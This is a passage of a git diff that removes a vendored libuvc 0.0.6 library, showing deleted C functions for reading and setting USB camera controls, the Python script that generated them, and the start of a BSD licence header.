-    UVC_PU_HUE_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *hue_auto = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the HUE_AUTO control.
- * @param devh UVC device handle
- * @param hue_auto TODO
- */
-uvc_error_t uvc_set_hue_auto(uvc_device_handle_t *devh, uint8_t hue_auto) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = hue_auto;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_HUE_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the SATURATION control.
- * @param devh UVC device handle
- * @param[out] saturation TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_saturation(uvc_device_handle_t *devh, uint16_t* saturation, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_SATURATION_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *saturation = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the SATURATION control.
- * @param devh UVC device handle
- * @param saturation TODO
- */
-uvc_error_t uvc_set_saturation(uvc_device_handle_t *devh, uint16_t saturation) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(saturation, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_SATURATION_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the SHARPNESS control.
- * @param devh UVC device handle
- * @param[out] sharpness TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_sharpness(uvc_device_handle_t *devh, uint16_t* sharpness, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_SHARPNESS_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *sharpness = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the SHARPNESS control.
- * @param devh UVC device handle
- * @param sharpness TODO
- */
-uvc_error_t uvc_set_sharpness(uvc_device_handle_t *devh, uint16_t sharpness) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(sharpness, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_SHARPNESS_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the GAMMA control.
- * @param devh UVC device handle
- * @param[out] gamma TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_gamma(uvc_device_handle_t *devh, uint16_t* gamma, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_GAMMA_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *gamma = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the GAMMA control.
- * @param devh UVC device handle
- * @param gamma TODO
- */
-uvc_error_t uvc_set_gamma(uvc_device_handle_t *devh, uint16_t gamma) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(gamma, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_GAMMA_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the WHITE_BALANCE_TEMPERATURE control.
- * @param devh UVC device handle
- * @param[out] temperature TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_white_balance_temperature(uvc_device_handle_t *devh, uint16_t* temperature, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_WHITE_BALANCE_TEMPERATURE_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *temperature = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the WHITE_BALANCE_TEMPERATURE control.
- * @param devh UVC device handle
- * @param temperature TODO
- */
-uvc_error_t uvc_set_white_balance_temperature(uvc_device_handle_t *devh, uint16_t temperature) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(temperature, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_WHITE_BALANCE_TEMPERATURE_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the WHITE_BALANCE_TEMPERATURE_AUTO control.
- * @param devh UVC device handle
- * @param[out] temperature_auto TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_white_balance_temperature_auto(uvc_device_handle_t *devh, uint8_t* temperature_auto, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_WHITE_BALANCE_TEMPERATURE_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *temperature_auto = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the WHITE_BALANCE_TEMPERATURE_AUTO control.
- * @param devh UVC device handle
- * @param temperature_auto TODO
- */
-uvc_error_t uvc_set_white_balance_temperature_auto(uvc_device_handle_t *devh, uint8_t temperature_auto) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = temperature_auto;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_WHITE_BALANCE_TEMPERATURE_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the WHITE_BALANCE_COMPONENT control.
- * @param devh UVC device handle
- * @param[out] blue TODO
- * @param[out] red TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_white_balance_component(uvc_device_handle_t *devh, uint16_t* blue, uint16_t* red, enum uvc_req_code req_code) {
-  uint8_t data[4];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_WHITE_BALANCE_COMPONENT_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *blue = SW_TO_SHORT(data + 0);
-    *red = SW_TO_SHORT(data + 2);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the WHITE_BALANCE_COMPONENT control.
- * @param devh UVC device handle
- * @param blue TODO
- * @param red TODO
- */
-uvc_error_t uvc_set_white_balance_component(uvc_device_handle_t *devh, uint16_t blue, uint16_t red) {
-  uint8_t data[4];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(blue, data + 0);
-  SHORT_TO_SW(red, data + 2);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_WHITE_BALANCE_COMPONENT_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the WHITE_BALANCE_COMPONENT_AUTO control.
- * @param devh UVC device handle
- * @param[out] white_balance_component_auto TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_white_balance_component_auto(uvc_device_handle_t *devh, uint8_t* white_balance_component_auto, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_WHITE_BALANCE_COMPONENT_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *white_balance_component_auto = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the WHITE_BALANCE_COMPONENT_AUTO control.
- * @param devh UVC device handle
- * @param white_balance_component_auto TODO
- */
-uvc_error_t uvc_set_white_balance_component_auto(uvc_device_handle_t *devh, uint8_t white_balance_component_auto) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = white_balance_component_auto;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_WHITE_BALANCE_COMPONENT_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the DIGITAL_MULTIPLIER control.
- * @param devh UVC device handle
- * @param[out] multiplier_step TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_digital_multiplier(uvc_device_handle_t *devh, uint16_t* multiplier_step, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_DIGITAL_MULTIPLIER_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *multiplier_step = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the DIGITAL_MULTIPLIER control.
- * @param devh UVC device handle
- * @param multiplier_step TODO
- */
-uvc_error_t uvc_set_digital_multiplier(uvc_device_handle_t *devh, uint16_t multiplier_step) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(multiplier_step, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_DIGITAL_MULTIPLIER_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the DIGITAL_MULTIPLIER_LIMIT control.
- * @param devh UVC device handle
- * @param[out] multiplier_step TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_digital_multiplier_limit(uvc_device_handle_t *devh, uint16_t* multiplier_step, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_DIGITAL_MULTIPLIER_LIMIT_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *multiplier_step = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the DIGITAL_MULTIPLIER_LIMIT control.
- * @param devh UVC device handle
- * @param multiplier_step TODO
- */
-uvc_error_t uvc_set_digital_multiplier_limit(uvc_device_handle_t *devh, uint16_t multiplier_step) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(multiplier_step, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_DIGITAL_MULTIPLIER_LIMIT_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the ANALOG_VIDEO_STANDARD control.
- * @param devh UVC device handle
- * @param[out] video_standard TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_analog_video_standard(uvc_device_handle_t *devh, uint8_t* video_standard, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_ANALOG_VIDEO_STANDARD_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *video_standard = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the ANALOG_VIDEO_STANDARD control.
- * @param devh UVC device handle
- * @param video_standard TODO
- */
-uvc_error_t uvc_set_analog_video_standard(uvc_device_handle_t *devh, uint8_t video_standard) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = video_standard;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_ANALOG_VIDEO_STANDARD_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the ANALOG_LOCK_STATUS control.
- * @param devh UVC device handle
- * @param[out] status TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_analog_video_lock_status(uvc_device_handle_t *devh, uint8_t* status, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_ANALOG_LOCK_STATUS_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *status = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the ANALOG_LOCK_STATUS control.
- * @param devh UVC device handle
- * @param status TODO
- */
-uvc_error_t uvc_set_analog_video_lock_status(uvc_device_handle_t *devh, uint8_t status) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = status;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_ANALOG_LOCK_STATUS_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the INPUT_SELECT control.
- * @param devh UVC device handle
- * @param[out] selector TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_input_select(uvc_device_handle_t *devh, uint8_t* selector, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_SU_INPUT_SELECT_CONTROL << 8,
-    uvc_get_selector_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *selector = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the INPUT_SELECT control.
- * @param devh UVC device handle
- * @param selector TODO
- */
-uvc_error_t uvc_set_input_select(uvc_device_handle_t *devh, uint8_t selector) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = selector;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_SU_INPUT_SELECT_CONTROL << 8,
-    uvc_get_selector_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
diff --git a/thirdparty/libuvc-0.0.6/src/ctrl-gen.py b/thirdparty/libuvc-0.0.6/src/ctrl-gen.py
deleted file mode 100755
index d349a73..0000000
--- a/thirdparty/libuvc-0.0.6/src/ctrl-gen.py
+++ /dev/null
@@ -1,302 +0,0 @@
-#!/usr/bin/env python
-from __future__ import print_function
-from collections import OrderedDict
-import getopt
-import sys
-import yaml
-
-class quoted(str): pass
-
-def quoted_presenter(dumper, data):
-    return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='"')
-yaml.add_representer(quoted, quoted_presenter)
-
-class literal(str): pass
-
-def literal_presenter(dumper, data):
-    return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|')
-yaml.add_representer(literal, literal_presenter)
-
-def ordered_dict_presenter(dumper, data):
-    return dumper.represent_dict(data.items())
-yaml.add_representer(OrderedDict, ordered_dict_presenter)
-
-def dict_constructor(loader, node):
-    return OrderedDict(loader.construct_pairs(node))
-_mapping_tag = yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG
-yaml.add_constructor(_mapping_tag, dict_constructor)
-
-class IntField(object):
-    def __init__(self, name, position, length, signed):
-        self.name = name
-        self.position = position
-        self.length = length
-        self.signed = signed
-
-        if not self.length in [1, 2, 4]:
-            raise Exception("bad length " + str(self.length))
-
-        self.user_type = ('u' if not signed else '') + 'int' + str(length * 8) + '_t'
-
-    def getter_sig(self):
-        return "{0}* {1}".format(self.user_type, self.name)
-
-    def unpack(self):
-        if self.length == 1:
-            return "*{0} = data[{1}];".format(self.name, self.position)
-        elif self.length == 2:
-            return "*{0} = SW_TO_SHORT(data + {1});".format(self.name, self.position)
-        elif self.length == 4:
-            return "*{0} = DW_TO_INT(data + {1});".format(self.name, self.position)
-
-    def setter_sig(self):
-        return "{0} {1}".format(self.user_type, self.name)
-
-    def pack(self):
-        if self.length == 1:
-            return "data[{0}] = {1};".format(self.position, self.name)
-        elif self.length == 2:
-            return "SHORT_TO_SW({0}, data + {1});".format(self.name, self.position)
-        elif self.length == 4:
-            return "INT_TO_DW({0}, data + {1});".format(self.name, self.position)
-
-    def spec(self):
-        rep = [('position', self.position), ('length', self.length)]
-        if self.signed:
-            rep.append(('signed', True))
-        return rep
-
-    @staticmethod
-    def load(spec):
-        return IntField(spec['name'], spec['position'], spec['length'], spec['signed'] if signed in spec else False)
-
-def load_field(name, spec):
-    if spec['type'] == 'int':
-        return IntField(name, spec['position'], spec['length'], spec.get('signed', False))
-    else:
-        raise Exception("unknown field type '{0}'".format(spec['type']))
-
-GETTER_TEMPLATE = """/** @ingroup ctrl
- * {gen_doc}
- * @param devh UVC device handle
- * {args_doc}
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_{control_name}(uvc_device_handle_t *devh, {args_signature}, enum uvc_req_code req_code) {{
-  uint8_t data[{control_length}];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    {control_code} << 8,
-    {unit_fn} << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {{
-    {unpack}
-    return UVC_SUCCESS;
-  }} else {{
-    return ret;
-  }}
-}}
-"""
-
-SETTER_TEMPLATE = """/** @ingroup ctrl
- * {gen_doc}
- * @param devh UVC device handle
- * {args_doc}
- */
-uvc_error_t uvc_set_{control_name}(uvc_device_handle_t *devh, {args_signature}) {{
-  uint8_t data[{control_length}];
-  uvc_error_t ret;
-
-  {pack}
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    {control_code} << 8,
-    {unit_fn} << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}}
-"""
-
-def gen_decl(unit_name, unit, control_name, control):
-    fields = [(load_field(field_name, field_details), field_details['doc']) for field_name, field_details in control['fields'].items()] if 'fields' in control else []
-
-    get_args_signature = ', '.join([field.getter_sig() for (field, desc) in fields])
-    set_args_signature = ', '.join([field.setter_sig() for (field, desc) in fields])
-
-    return "uvc_error_t uvc_get_{function_name}(uvc_device_handle_t *devh, {args_signature}, enum uvc_req_code req_code);\n".format(**{
-        "function_name": control_name,
-        "args_signature": get_args_signature
-    }) + "uvc_error_t uvc_set_{function_name}(uvc_device_handle_t *devh, {args_signature});\n".format(**{
-        "function_name": control_name,
-        "args_signature": set_args_signature
-    })
-
-def gen_ctrl(unit_name, unit, control_name, control):
-    fields = [(load_field(field_name, field_details), field_details['doc']) for field_name, field_details in control['fields'].items()] if 'fields' in control else []
-
-    get_args_signature = ', '.join([field.getter_sig() for (field, desc) in fields])
-    set_args_signature = ', '.join([field.setter_sig() for (field, desc) in fields])
-    unpack = "\n    ".join([field.unpack() for (field, desc) in fields])
-    pack = "\n  ".join([field.pack() for (field, desc) in fields])
-
-    get_gen_doc_raw = None
-    set_gen_doc_raw = None
-
-    if 'doc' in control:
-        doc = control['doc']
-
-        if isinstance(doc, str):
-            get_gen_doc_raw = "\n * ".join(doc.splitlines())
-            set_gen_doc_raw = get_gen_doc_raw
-        else:
-            if 'get' in doc:
-                get_gen_doc_raw = "\n * ".join(doc['get'].splitlines())
-            if 'set' in doc:
-                set_gen_doc_raw = "\n * ".join(doc['set'].splitlines())
-
-    if get_gen_doc_raw is not None:
-        get_gen_doc = get_gen_doc_raw.format(gets_sets='Reads')
-    else:
-        get_gen_doc = '@brief Reads the ' + control['control'] + ' control.'
-
-    if set_gen_doc_raw is not None:
-        set_gen_doc = set_gen_doc_raw.format(gets_sets='Sets')
-    else:
-        set_gen_doc = '@brief Sets the ' + control['control'] + ' control.'
-
-    get_args_doc = "\n * ".join(["@param[out] {0} {1}".format(field.name, desc) for (field, desc) in fields])
-    set_args_doc = "\n * ".join(["@param {0} {1}".format(field.name, desc) for (field, desc) in fields])
-
-    control_code = 'UVC_' + unit['control_prefix'] + '_' + control['control'] + '_CONTROL'
-
-    unit_fn = "uvc_get_camera_terminal(devh)->bTerminalID" if (unit_name == "camera_terminal") else ("uvc_get_" + unit_name + "s(devh)->bUnitID")
-
-    return GETTER_TEMPLATE.format(
-        unit=unit,
-        unit_fn=unit_fn,
-        control_name=control_name,
-        control_code=control_code,
-        control_length=control['length'],
-        args_signature=get_args_signature,
-        args_doc=get_args_doc,
-        gen_doc=get_gen_doc,
-        unpack=unpack) + "\n\n" + SETTER_TEMPLATE.format(
-            unit=unit,
-            unit_fn=unit_fn,
-            control_name=control_name,
-            control_code=control_code,
-            control_length=control['length'],
-            args_signature=set_args_signature,
-            args_doc=set_args_doc,
-            gen_doc=set_gen_doc,
-            pack=pack
-        )
-
-def export_unit(unit):
-    def fmt_doc(doc):
-        def wrap_doc_entry(entry):
-            if "\n" in entry:
-                return literal(entry)
-            else:
-                return entry
-
-        if isinstance(doc, str):
-            return wrap_doc_entry(doc)
-        else:
-            return OrderedDict([(mode, wrap_doc_entry(text)) for mode, text in doc.items()])
-
-    def fmt_ctrl(control_name, control_details):
-        contents = OrderedDict()
-        contents['control'] = control_details['control']
-        contents['length'] = control_details['length']
-        contents['fields'] = control_details['fields']
-
-        if 'doc' in control_details:
-            contents['doc'] = fmt_doc(control_details['doc'])
-
-        return (control_name, contents)
-
-    unit_out = OrderedDict()
-    unit_out['type'] = unit['type']
-    if 'guid' in unit:
-        unit_out['guid'] = unit['guid']
-    if 'description' in unit:
-        unit_out['description'] = unit['description']
-    if 'control_prefix' in unit:
-        unit_out['control_prefix'] = unit['control_prefix']
-    unit_out['controls'] = OrderedDict([fmt_ctrl(ctrl_name, ctrl_details) for ctrl_name, ctrl_details in unit['controls'].items()])
-    return unit_out
-
-if __name__ == '__main__':
-    try:
-        opts, args = getopt.getopt(sys.argv[1:], "hi:", ["help", "input="])
-    except getopt.GetoptError as err:
-        print(str(err))
-        usage()
-        sys.exit(-1)
-
-    inputs = []
-
-    for opt, val in opts:
-        if opt in ('-h', '--help'):
-            usage()
-            sys.exit(0)
-        elif opt in ('-i', '--input'):
-            inputs.append(val)
-
-    mode = None
-    for arg in args:
-        if arg in ('def', 'decl', 'yaml'):
-            if mode is None:
-                mode = arg
-            else:
-                print("Can't specify more than one mode")
-                sys.exit(-1)
-        else:
-            print("Invalid mode '{0}'".format(arg))
-            sys.exit(-1)
-
-    def iterunits():
-        for input_file in inputs:
-            with open(input_file, "r") as fp:
-                units = yaml.load(fp)['units']
-                for unit_name, unit_details in units.iteritems():
-                    yield unit_name, unit_details
-
-    if mode == 'def':
-        print("""/* This is an AUTO-GENERATED file! Update it with the output of `ctrl-gen.py def`. */
-#include "libuvc/libuvc.h"
-#include "libuvc/libuvc_internal.h"
-
-static const int REQ_TYPE_SET = 0x21;
-static const int REQ_TYPE_GET = 0xa1;
-""")
-        fun = gen_ctrl
-    elif mode == 'decl':
-        fun = gen_decl
-    elif mode == 'yaml':
-        exported_units = OrderedDict()
-        for unit_name, unit_details in iterunits():
-            exported_units[unit_name] = export_unit(unit_details)
-
-        yaml.dump({'units': exported_units}, sys.stdout, default_flow_style=False)
-        sys.exit(0)
-
-    for unit_name, unit_details in iterunits():
-        for control_name, control_details in unit_details['controls'].iteritems():
-            code = fun(unit_name, unit_details, control_name, control_details)
-            print(code)
diff --git a/thirdparty/libuvc-0.0.6/src/ctrl.c b/thirdparty/libuvc-0.0.6/src/ctrl.c
deleted file mode 100644
index 3dffe79..0000000
--- a/thirdparty/libuvc-0.0.6/src/ctrl.c
+++ /dev/null
@@ -1,165 +0,0 @@
-/*********************************************************************
-* Software License Agreement (BSD License)
-*
-*  Copyright (C) 2010-2012 Ken Tossell
-*  All rights reserved.
-*
-*  Redistribution and use in source and binary forms, with or without
-*  modification, are permitted provided that the following conditions
-*  are met:
-*
-*   * Redistributions of source code must retain the above copyright
-*     notice, this list of conditions and the following disclaimer.
-*   * Redistributions in binary form must reproduce the above
